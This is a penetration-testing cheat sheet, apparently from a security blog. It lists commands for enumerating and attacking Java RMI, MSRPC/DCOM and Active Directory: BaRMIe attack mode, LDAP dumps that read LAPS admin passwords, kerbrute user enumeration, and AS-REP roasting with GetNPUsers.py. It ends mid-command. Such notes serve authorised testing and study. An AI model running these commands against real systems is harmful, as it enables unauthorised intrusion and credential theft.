Steinz Security

  RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running  rmi-dumpregistry  ) #jmxrmi  bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network. java.lang.String getVersion() javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg) Java RMI Registry - Port 1616 nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616 BaRMIe #Download the package from releases https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 java -jar BaRMIe.jar -enum 192.168.1.11 5000 java -jar BaRMIe.jar -attack 192.168.1.11 5000 Remote Method Guesser https://github.com/qtc-de/remote-method-guesser java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum #Look for Vulnerabilities java -jar rmg.jar enum 10.10.10.10 5000 #Get bound names & available method

  rpcdump.py 10.10.10.10 -p 593 TCP 135 is the Endpoint Mapper and Component Object Model (COM) Service Control Manager. There’s a tool called rpcmap.py from Impacket that will show these mappings. This tool needs a stringbinding argument to enable it’s connection. The examples from -h are: stringbinding String binding to connect to MSRPC interface, for example: ncacn_ip_tcp:192.168.0.1[135] ncacn_np:192.168.0.1[\pipe\spoolss] ncacn_http:192.168.0.1[593] ncacn_http:[6001,RpcProxy=exchange.contoso.com:443] ncacn_http:localhost[3388,RpcProxy=rds.contoso:443] rpcmap.py 'ncacn_ip_tcp:10.10.10.10' reference for MS-DCOM #if you find IOXIDResolver in the UUID's you can run below script to #list network interfaces git clone https://github.com/mubix/IOXIDResolver.git cd IOXIDResolver python3 -m pip install -r requirements.txt python IOXIDResolver.py -t 10.10.10.10 Other things to check reg.py 10.10.10.10 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s service

  DNS dig srv domaim.com @DC_IP #Query ldap service dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP #query Root Domain Controller dig +short a rootdc.domain.com @DC_IP LDAP Enum #Nmap Scan for basic info nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10 #Get Domain name ldapsearch -x -h 10.10.10.10 -s base namingcontexts ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts #Look for misconfigs - Finding ms-MCS-AdmPwd ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd #Dump Everything ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)' #Dump Everything using ldeep ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump UserEnum git clone https://github.com/Bhanunamikaze/Wordlists.git cd Wordlists/Usernames kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt Find Pre-Auth Disabled Users GetNPUsers.py domain/ -u